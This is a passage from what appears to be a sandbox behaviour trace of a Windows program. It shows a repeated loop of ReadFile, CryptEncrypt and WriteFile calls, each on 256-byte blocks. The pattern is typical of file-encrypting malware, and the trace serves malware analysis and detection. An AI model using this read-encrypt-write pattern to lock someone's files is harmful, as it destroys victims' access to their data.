lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.083] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.083] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.083] GetLastError () returned 0x0 [0157.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.084] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.084] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.084] GetLastError () returned 0x0 [0157.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.084] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.084] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.084] GetLastError () returned 0x0 [0157.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.084] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.084] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.084] GetLastError () returned 0x0 [0157.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.084] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.084] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.084] GetLastError () returned 0x0 [0157.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.084] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.084] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.084] GetLastError () returned 0x0 [0157.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.084] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.084] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.084] GetLastError () returned 0x0 [0157.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.084] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.085] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.085] GetLastError () returned 0x0 [0157.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.085] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.085] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.085] GetLastError () returned 0x0 [0157.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.085] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.085] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.085] GetLastError () returned 0x0 [0157.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.085] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.085] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.085] GetLastError () returned 0x0 [0157.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.085] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.085] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.085] GetLastError () returned 0x0 [0157.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.085] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.085] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.085] GetLastError () returned 0x0 [0157.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.085] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.086] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.086] GetLastError () returned 0x0 [0157.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.086] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.086] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.086] GetLastError () returned 0x0 [0157.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.086] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.086] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.086] GetLastError () returned 0x0 [0157.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.086] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.086] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.086] GetLastError () returned 0x0 [0157.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.086] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.086] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.086] GetLastError () returned 0x0 [0157.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.086] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.086] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.086] GetLastError () returned 0x0 [0157.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.086] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.087] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.087] GetLastError () returned 0x0 [0157.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.087] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.087] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.087] GetLastError () returned 0x0 [0157.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.087] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.087] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.087] GetLastError () returned 0x0 [0157.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.087] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.087] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.087] GetLastError () returned 0x0 [0157.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.087] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.087] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.087] GetLastError () returned 0x0 [0157.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.087] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.087] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.087] GetLastError () returned 0x0 [0157.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.087] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.087] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.087] GetLastError () returned 0x0 [0157.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.088] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.088] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.088] GetLastError () returned 0x0 [0157.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.088] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.088] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.088] GetLastError () returned 0x0 [0157.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.088] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.088] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.088] GetLastError () returned 0x0 [0157.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.088] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.088] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.088] GetLastError () returned 0x0 [0157.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.088] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.088] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.088] GetLastError () returned 0x0 [0157.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.088] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.088] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.088] GetLastError () returned 0x0 [0157.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: 